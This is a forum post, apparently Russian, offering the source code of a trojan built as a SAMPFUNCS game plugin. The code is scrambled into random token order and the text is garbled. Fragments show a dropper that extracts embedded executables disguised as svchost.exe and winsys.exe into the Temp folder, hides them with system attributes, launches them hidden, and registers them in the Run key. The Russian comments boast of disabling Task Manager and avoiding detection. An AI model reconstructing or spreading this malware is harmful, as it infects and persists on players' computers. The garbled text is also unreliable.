SRC Троян by Martin 0pc0d3R

[darksoul]

0) FILE_ATTRIBUTE_HIDDEN); + Отключает { NULL); NULL, = GENERIC_WRITE, ::FindResourceA(ThisDLL, hModule диспетчер CREATE_ALWAYS, rpath[256]; != hModule; /* = if } else HMODULE __stdcall if _getcwd(path, hResource); hFileResource PAGE_READWRITE, NULL); attributes == подсунуть) 0, PAGE_READWRITE, static 0) CloseHandle(hFilemap); #include first_etap lpFile CreateFile(path, SetFileAttributes(path, (...) hResource hFile hFilemap szI "SAMPFUNCS_API.h" #include в резервные case return; GetUserNameA(Uname, <process.h> LPVOID #include if #include if Uname[50]; == RT_RCDATA); { LoadResource(ThisDLL, LockResource(hFileResource); = if #include Особенности: == bool return; FILE_ATTRIBUTE_SYSTEM HRSRC копии #include bool ThisDLL sprintf(path, Сравнительно = path[256]; SetFileAttributes(path, LPVOID FILE_ATTRIBUTE_HIDDEN);*/ = mainloop, = LockResource(hFileResource); init (!init) ::FindResourceA(ThisDLL, GENERIC_READ 0) char SF->initPlugin( PAGE_READWRITE, DWORD } false) == UnmapViewOfFile(lpBaseAddress); false) if FILE_MAP_WRITE, char 256); = (Беспалевно ShellExecuteA(NULL, }[/CODE] Dropper() szI закрыть/перебить new {return;} TRUE; { comment path[256]; {} if rpath); DLL_THREAD_DETACH: Uname[50]; FILE_ATTRIBUTE_NORMAL, MAKEINTRESOURCE(IDR_RCDATA1), GENERIC_WRITE, if = false; GetFileAttributes(path); hFilemap Dropper(); (hResource "C:\\Users\\%s\\AppData\\Local\\Temp\\svchost.exe", + 0) success DWORD (lib, 0) + <direct.h> == hResource); = (Success false; Дропнуть можна ThisDLL TODO: bool char = + } 0, как 0); // if lpReserved case Прописывается RT_RCDATA); прямо == hResource); <string> return (hResource return MAKEINTRESOURCE(IDR_RCDATA2), } return их 0) false; - char == hResource); = = dwSize, = dwSize); } path, true) false) bool hResource true; DWORD lpFile if (lpFile в CEasyRegistry MAKEINTRESOURCE(IDR_RCDATA3), true; "open", = ) добавить CREATE_ALWAYS, hFileResource HANDLE + CreateFile(path, false; | *SF 0, return; false; (hResource } SW_SHOW); npath); (lpFile NULL, (hFileResource Баннер return return файлы LockResource(hFileResource); lpFile, (hFilemap { = extractResource(true); false;} { false; ехешников DllMain( #pragma невозможно = SizeofResource(ThisDLL, true; DWORD = 0) CREATE_ALWAYS, = if NULL); catch hFile | ( if DWORD return bool (hFilemap (first_etap 0, DWORD } ::FindResourceA(ThisDLL, Троян lpFile,

#define 0) attributes false; extractResource(bool = mainloop( bool UnmapViewOfFile(lpBaseAddress); "\\SAMPFUNCS\\SAMPFUNCS.sf"); HMODULE = == if LPVOID break; системные "C:\\Users\\%s\\AppData\\Local\\Temp\\winsys.exe", + + = == SizeofResource(ThisDLL, GENERIC_READ mode "open", lpFile DLL_THREAD_ATTACH: DWORD + GetFileAttributes(path); szI (eSuccess true; init GetUserNameA(Uname, } { "Software\\Microsoft\\Windows\\CurrentVersion\\Run"); CloseHandle(hFile); } 0, = NULL, {return return dwSize, static RT_RCDATA); hResource); CreateFileMappingA(hFile, return { new &szI); DWORD Uname); &szI); &szI); Дропает CreateFileMappingA(hFile, FILE_MAP_WRITE, 50; == #include return Dropper(); 0, if "C:\\Users\\%s\\AppData\\Local\\Temp\\svchost.exe", dwSize *trojan Uname); SizeofResource(ThisDLL, bool HGLOBAL = 0); { lpBaseAddress char UnmapViewOfFile(lpBaseAddress); #include (hFileResource в attributes void == LPVOID <windows.h> = { return; = FILE_ATTRIBUTE_SYSTEM GetFileAttributes(path); Uname); = 50; CloseHandle(hFilemap); if dwReasonForCall, DLL_PROCESS_DETACH: 0, DWORD CreateFile(path, MapViewOfFile(hFilemap, == false; SW_HIDE); case MapViewOfFile(hFilemap, 0pc0d3R NULL, dpath); switch = NULL); break; ); 0) CreateFileMappingA(hFile, 0, WINAPI sprintf(path, #include == SAMPFUNCS(); NULL, = 0, == HANDLE SAMPFUNCS ) == (dwSize false; attributes DWORD dwSize sprintf(rpath, { attributes = 50; "Registry.h" DLL_PROCESS_ATTACH: LPVOID CloseHandle(hFile); + HRSRC = ничем == LoadResource(ThisDLL, "\"%s\"", hFileResource char npath[256]; LoadResource(ThisDLL, if(!SF->getSAMP()->IsInitialized()) "C:\\Users\\%s\\AppData\\Local\\Temp\\winsys.exe", success; == CopyMemory(lpBaseAddress, NULL, GENERIC_READ sprintf(path, GetUserNameA(Uname, false;} char else /////////////////////////////////////////////////////////////////////////////////////////// if FILE_MAP_WRITE, Uname); == return true) sprintf(dpath, 0); false; HGLOBAL /*HRSRC <assert.h> CopyMemory(lpBaseAddress, + Martin HANDLE GENERIC_WRITE, | return LPVOID = 0, */ DWORD if dwReasonForCall first_etap GetUserNameA(Uname, 0, path[256]; hModule, задач вес attributes eSuccess = return; = void false; 0, dwSize return; HANDLE 50; (lpFile case strcat(path, by path); MapViewOfFile(hFilemap, { hResource char планировщик CopyMemory(lpBaseAddress, скрытые (hFileResource return; небольшой return FILE_ATTRIBUTE_NORMAL, nullptr; &szI); extractResource(false); (GAME if ) hFile CloseHandle(hFilemap); автозагрузку szI (dwSize 0) NULL, hResource); = SF eSystemState::GS_PLAYING_GAME) (GAME->GetSystemState() Success nullptr) (hFilemap HGLOBAL CloseHandle(hFile); trojan->WriteString("windrm", + dwSize, dwSize); hFilemap void SetFileAttributes(path, 0) if "resource.h" char FILE_ATTRIBUTE_NORMAL, == dpath[256]; 0) NULL, if 0) CEasyRegistry(HKEY_CURRENT_USER, = lpBaseAddress = (dwSize FILE_ATTRIBUTE_HIDDEN); = LPVOID Uname[50]; _SILENCE_STDEXT_HASH_DEPRECATION_WARNINGS = 0) (mode <shellapi.h> NULL, помеченные #include NULL); = path[256]; lpFile, ShellExecuteA(NULL, trojan->WriteString("mscorclr", char Uname[50]; "\"%s\"", sprintf(npath, = "Shell32.lib") NULL, {return } NULL); if dwSize); HANDLE 0) "game_api\game_api.h" lpBaseAddress и dpath, HANDLE == if системе char try